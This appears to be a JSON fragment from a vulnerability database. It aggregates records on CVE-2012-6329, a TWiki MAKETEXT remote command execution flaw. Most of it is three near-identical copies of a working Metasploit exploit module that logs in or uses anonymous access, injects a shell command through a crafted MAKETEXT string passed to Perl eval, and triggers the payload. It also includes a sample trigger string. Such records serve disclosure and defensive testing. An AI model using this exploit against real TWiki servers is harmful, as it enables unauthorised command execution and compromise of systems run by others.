"https://packetstormsecurity.com/files/download/118856/twiki5-exec.txt"}, {"lastseen": "2016-12-05T22:20:57", "description": "", "published": "2012-12-24T00:00:00", "type": "packetstorm", "title": "TWiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-24T00:00:00", "id": "PACKETSTORM:119054", "href": "https://packetstormsecurity.com/files/119054/TWiki-MAKETEXT-Remote-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TWiki MAKETEXT Remote Command Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the MAKETEXT Twiki variable. By using a \nspecially crafted MAKETEXT, a malicious user can execute shell commands since user \ninput is passed to the Perl \"eval\" command without first being sanitized. The \nproblem is caused by an underlying security issue in the CPAN:Locale::Maketext \nmodule. This works in TWiki sites that have user interface localization enabled \n(UserInterfaceInternationalisation variable set). \n \nIf USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, \nif the 'TwikiPage' option isn't provided, the module will try to create a random \npage on the SandBox space. The modules has been tested successfully on \nTWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine. \n}, \n'Author' => \n[ \n'George Clark', # original discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2012-6329' ], \n[ 'OSVDB', '88460' ], \n[ 'BID', '56950' ], \n[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ] \n], \n'Privileged' => false, # web server context \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 1024, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic ruby python bash telnet' \n} \n}, \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Automatic', { }]], \n'DisclosureDate' => 'Dec 15 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]), \nOptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]), \nOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]), \nOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ]) \n], self.class) \nend \n \ndef do_login(username, password) \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}do/login\", \n'vars_post' => \n{ \n'username' => username, \n'password' => password \n} \n}) \n \nif not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ \nreturn nil \nend \n \nsession = $1 \nreturn session \nend \n \ndef inject_code(session, code) \n \nvprint_status(\"Retrieving the crypttoken...\") \n \nres = send_request_cgi({ \n'uri' => \"#{@base}do/edit#{@page}\", \n'cookie' => \"TWIKISID=#{session}\", \n'vars_get' => \n{ \n'nowysiwyg' => '1' \n} \n}) \n \nif not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/ \nvprint_error(\"Error retrieving the crypttoken\") \nreturn nil \nend \n \ncrypttoken = $1 \nvprint_good(\"crypttoken found: #{crypttoken}\") \n \nif session.empty? \nif res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ \nsession = $1 \nelse \nvprint_error(\"Error using anonymous access\") \nreturn nil \nend \nend \n \nvprint_status(\"Injecting the payload...\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}do/save#{@page}\", \n'cookie' => \"TWIKISID=#{session}\", \n'vars_post' => \n{ \n'crypttoken' => crypttoken, \n'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\" \n} \n}) \n \nif not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/ \nprint_warning(\"Error injecting the payload\") \nprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\" \nreturn nil \nend \n \nlocation = URI(res.headers['Location']).path \nprint_good(\"Payload injected on #{location}\") \n \nreturn location \nend \n \ndef check \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \nres = send_request_cgi({ \n'uri' => \"#{@base}do/view/TWiki/WebHome\" \n}) \n \nif not res or res.code != 200 \nreturn Exploit::CheckCode::Unknown \nend \n \nif res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/ \nversion = $1 \nprint_status(\"Version found: #{version}\") \nif version < \"5.1.3\" \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \nreturn Exploit::CheckCode::Detected \nend \n \n \ndef exploit \n \n# Init variables \n@page = '' \n \nif datastore['TwikiPage'] and not datastore['TwikiPage'].empty? \n@page << '/' if datastore['TwikiPage'][0] != '/' \n@page << datastore['TwikiPage'] \nelse \n@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\" \nend \n \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \n# Login if needed \nif (datastore['USERNAME'] and \nnot datastore['USERNAME'].empty? and \ndatastore['PASSWORD'] and \nnot datastore['PASSWORD'].empty?) \nprint_status(\"Trying login to get session ID...\") \nsession = do_login(datastore['USERNAME'], datastore['PASSWORD']) \nelse \nprint_status(\"Using anonymous access...\") \nsession = \"\" \nend \n \nif not session \nfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\") \nend \n \n# Inject payload \nprint_status(\"Trying to inject the payload on #{@page}...\") \nres = inject_code(session, payload.encoded) \nif not res \nfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\") \nend \n \n# Execute payload \nprint_status(\"Executing the payload through #{res}...\") \nres = send_request_cgi({ \n'uri' => res, \n'cookie' => \"TWIKISID=#{session}\" \n}) \nif not res or res.code != 200 or res.body !~ /HASH/ \nfail_with(Exploit::Failure::Unknown, \"Error executing the payload\") \nend \n \nprint_good(\"Exploitation was successful\") \n \nend \n \nend \n \n=begin \n \n* Trigger: \n \n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}% \n \n=end`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119054/twiki_maketext.rb.txt"}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "description": "Remote code execution vulnerability in TWiki\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2013-01-13T00:00:00", "id": "E-304", "href": "", "type": "dsquare", "title": "TWiki 5.1.2 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:47:37", "description": "No description provided by source.", "published": "2012-12-25T00:00:00", "title": "TWiki MAKETEXT Remote Command Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60534", "id": "SSV:60534", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 &lt; Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' =&gt; 'TWiki MAKETEXT Remote Command Execution',\r\n 'Description' =&gt; %q{\r\n This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\r\n specially crafted MAKETEXT, a malicious user can execute shell commands since user\r\n input is passed to the Perl &quot;eval&quot; command without first being sanitized. The\r\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\r\n module. This works in TWiki sites that have user interface localization enabled\r\n (UserInterfaceInternationalisation variable set).\r\n \r\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\r\n if the 'TwikiPage' option isn't provided, the module will try to create a random\r\n page on the SandBox space. The modules has been tested successfully on\r\n TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\r\n },\r\n 'Author' =&gt;\r\n [\r\n 'George Clark', # original discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' =&gt; MSF_LICENSE,\r\n 'References' =&gt;\r\n [\r\n [ 'CVE', '2012-6329' ],\r\n [ 'OSVDB', '88460' ],\r\n [ 'BID', '56950' ],\r\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\r\n ],\r\n 'Privileged' =&gt; false, # web server context\r\n 'Payload' =&gt;\r\n {\r\n 'DisableNops' =&gt; true,\r\n 'Space' =&gt; 1024,\r\n 'Compat' =&gt;\r\n {\r\n 'PayloadType' =&gt; 'cmd',\r\n 'RequiredCmd' =&gt; 'generic ruby python bash telnet'\r\n }\r\n },\r\n 'Platform' =&gt; [ 'unix' ],\r\n 'Arch' =&gt; ARCH_CMD,\r\n 'Targets' =&gt; [[ 'Automatic', { }]],\r\n 'DisclosureDate' =&gt; 'Dec 15 2012',\r\n 'DefaultTarget' =&gt; 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, &quot;TWiki base path&quot;, &quot;/&quot; ]),\r\n OptString.new('TwikiPage', [ false, &quot;TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)&quot; ]),\r\n OptString.new('USERNAME', [ false, &quot;The user to authenticate as (anonymous if username not provided)&quot;]),\r\n OptString.new('PASSWORD', [ false, &quot;The password to authenticate with (anonymous if password not provided)&quot; ])\r\n ], self.class)\r\n end\r\n \r\n def do_login(username, password)\r\n res = send_request_cgi({\r\n 'method' =&gt; 'POST',\r\n 'uri' =&gt; &quot;#{@base}do/login&quot;,\r\n 'vars_post' =&gt;\r\n {\r\n 'username' =&gt; username,\r\n 'password' =&gt; password\r\n }\r\n })\r\n \r\n if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/\r\n return nil\r\n end\r\n \r\n session = $1\r\n return session\r\n end\r\n \r\n def inject_code(session, code)\r\n \r\n vprint_status(&quot;Retrieving the crypttoken...&quot;)\r\n \r\n res = send_request_cgi({\r\n 'uri' =&gt; &quot;#{@base}do/edit#{@page}&quot;,\r\n 'cookie' =&gt; &quot;TWIKISID=#{session}&quot;,\r\n 'vars_get' =&gt;\r\n {\r\n 'nowysiwyg' =&gt; '1'\r\n }\r\n })\r\n \r\n if not res or res.code != 200 or res.body !~ /name=&quot;crypttoken&quot; value=&quot;([0-9a-f]*)&quot;/\r\n vprint_error(&quot;Error retrieving the crypttoken&quot;)\r\n return nil\r\n end\r\n \r\n crypttoken = $1\r\n vprint_good(&quot;crypttoken found: #{crypttoken}&quot;)\r\n \r\n if session.empty?\r\n if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/\r\n session = $1\r\n else\r\n vprint_error(&quot;Error using anonymous access&quot;)\r\n return nil\r\n end\r\n end\r\n \r\n vprint_status(&quot;Injecting the payload...&quot;)\r\n \r\n res = send_request_cgi({\r\n 'method' =&gt; 'POST',\r\n 'uri' =&gt; &quot;#{@base}do/save#{@page}&quot;,\r\n 'cookie' =&gt; &quot;TWIKISID=#{session}&quot;,\r\n 'vars_post' =&gt;\r\n {\r\n 'crypttoken' =&gt; crypttoken,\r\n 'text' =&gt; &quot;#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\&quot;#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\&quot; args=\\&quot;#{rand_text_alpha(3 + rand(3))}\\&quot;}%&quot;\r\n }\r\n })\r\n \r\n if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\r\n print_warning(&quot;Error injecting the payload&quot;)\r\n print_status &quot;#{res.code}\\n#{res.body}\\n#{res.headers['Location']}&quot;\r\n return nil\r\n end\r\n \r\n location = URI(res.headers['Location']).path\r\n print_good(&quot;Payload injected on #{location}&quot;)\r\n \r\n return location\r\n end\r\n \r\n def check\r\n @base = target_uri.path\r\n @base &lt;&lt; '/' if @base[-1, 1] != '/'\r\n \r\n res = send_request_cgi({\r\n 'uri' =&gt; &quot;#{@base}do/view/TWiki/WebHome&quot;\r\n })\r\n \r\n if not res or res.code != 200\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n if res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\r\n version = $1\r\n print_status(&quot;Version found: #{version}&quot;)\r\n if version &lt; &quot;5.1.3&quot;\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n return Exploit::CheckCode::Detected\r\n end\r\n \r\n \r\n def exploit\r\n \r\n # Init variables\r\n @page = ''\r\n \r\n if datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\r\n @page &lt;&lt; '/' if datastore['TwikiPage'][0] != '/'\r\n @page &lt;&lt; datastore['TwikiPage']\r\n else\r\n @page &lt;&lt; &quot;/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}&quot;\r\n end\r\n \r\n @base = target_uri.path\r\n @base &lt;&lt; '/' if @base[-1, 1] != '/'\r\n \r\n # Login if needed\r\n if (datastore['USERNAME'] and\r\n not datastore['USERNAME'].empty? and\r\n datastore['PASSWORD'] and\r\n not datastore['PASSWORD'].empty?)\r\n print_status(&quot;Trying login to get session ID...&quot;)\r\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n else\r\n print_status(&quot;Using anonymous access...&quot;)\r\n session = &quot;&quot;\r\n end\r\n \r\n if not session\r\n fail_with(Exploit::Failure::Unknown, &quot;Error getting a session ID&quot;)\r\n end\r\n \r\n # Inject payload\r\n print_status(&quot;Trying to inject the payload on #{@page}...&quot;)\r\n res = inject_code(session, payload.encoded)\r\n if not res\r\n fail_with(Exploit::Failure::Unknown, &quot;Error injecting the payload&quot;)\r\n end\r\n \r\n # Execute payload\r\n print_status(&quot;Executing the payload through #{res}...&quot;)\r\n res = send_request_cgi({\r\n 'uri' =&gt; res,\r\n 'cookie' =&gt; &quot;TWIKISID=#{session}&quot;\r\n })\r\n if not res or res.code != 200 or res.body !~ /HASH/\r\n fail_with(Exploit::Failure::Unknown, &quot;Error executing the payload&quot;)\r\n end\r\n \r\n print_good(&quot;Exploitation was successful&quot;)\r\n \r\n end\r\n \r\nend\r\n \r\n=begin\r\n \r\n* Trigger:\r\n \r\n%MAKETEXT{&quot;test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #&quot; args=&quot;msf&quot;}%\r\n \r\n=end\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60534"}], "metasploit": [{"lastseen": "2020-10-12T23:26:48", "description": "This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since user input is passed to the Perl \"eval\" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. This works in TWiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set). If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the 'TwikiPage' option isn't provided, the module will try to create a random page on the SandBox space. The module has been tested successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\n", "published": "2012-12-21T10:30:04", "type": "metasploit", "title": "TWiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/TWIKI_MAKETEXT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TWiki MAKETEXT Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\n specially crafted MAKETEXT, a malicious user can execute shell commands since user\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. This works in TWiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set).\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\n if the 'TwikiPage' option isn't provided, the module will try to create a random\n page on the SandBox space. The module has been tested successfully on\n TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\n },\n 'Author' =>\n [\n 'George Clark', # original discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-6329' ],\n [ 'OSVDB', '88460' ],\n [ 'BID', '56950' ],\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 1024,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic ruby python telnet'\n }\n },\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => '2012-12-15',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]),\n OptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\n OptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\n OptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\n ])\n end\n\n def post_auth?\n true\n end\n\n def do_login(username, password)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}do/login\",\n 'vars_post' =>\n {\n 'username' => username,\n 'password' => password\n }\n })\n\n if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/\n return nil\n end\n\n session = $1\n return session\n end\n\n def inject_code(session, code)\n\n vprint_status(\"Retrieving the crypttoken...\")\n\n res = send_request_cgi({\n 'uri' => \"#{@base}do/edit#{@page}\",\n 'cookie' => \"TWIKISID=#{session}\",\n 'vars_get' =>\n {\n 'nowysiwyg' => '1'\n }\n })\n\n if not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/\n vprint_error(\"Error retrieving the crypttoken\")\n return nil\n end\n\n crypttoken = $1\n vprint_good(\"crypttoken found: #{crypttoken}\")\n\n if session.empty?\n if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/\n session = $1\n else\n vprint_error(\"Error using anonymous access\")\n return nil\n end\n end\n\n vprint_status(\"Injecting the payload...\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}do/save#{@page}\",\n 'cookie' => \"TWIKISID=#{session}\",\n 'vars_post' =>\n {\n 'crypttoken' => crypttoken,\n 'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\n }\n })\n\n if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\n print_warning(\"Error injecting the payload\")\n print_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\n return nil\n end\n\n location = URI(res.headers['Location']).path\n print_good(\"Payload injected on #{location}\")\n\n return location\n end\n\n def check\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => \"#{@base}do/view/TWiki/WebHome\"\n })\n\n if not res or res.code != 200\n return Exploit::CheckCode::Unknown\n end\n\n if res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\n version = $1\n vprint_status(\"Version found: #{version}\")\n if version < \"5.1.3\"\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n\n # Init variables\n @page = ''\n\n if datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\n @page << '/' if datastore['TwikiPage'][0] != '/'\n @page << datastore['TwikiPage']\n else\n @page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\n end\n\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n # Login if needed\n if (datastore['USERNAME'] and\n not datastore['USERNAME'].empty? and\n datastore['PASSWORD'] and\n not datastore['PASSWORD'].empty?)\n print_status(\"Trying login to get session ID...\")\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\n else\n print_status(\"Using anonymous access...\")\n session = \"\"\n end\n\n if not session\n fail_with(Failure::Unknown, \"Error getting a session ID\")\n end\n\n # Inject payload\n print_status(\"Trying to inject the payload on #{@page}...\")\n res = inject_code(session, payload.encoded)\n if not res\n fail_with(Failure::Unknown, \"Error injecting the payload\")\n end\n\n # Execute payload\n print_status(\"Executing the payload through #{res}...\")\n res = send_request_cgi({\n 'uri' => res,\n 'cookie' => \"TWIKISID=#{session}\"\n })\n if not res or res.code != 200 or res.body !~ /HASH/\n fail_with(Failure::Unknown, \"Error executing the payload\")\n end\n\n print_good(\"Exploitation was successful\")\n\n end\nend\n\n=begin\n\n* Trigger:\n\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\n\n=end\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/twiki_maketext.rb"}]}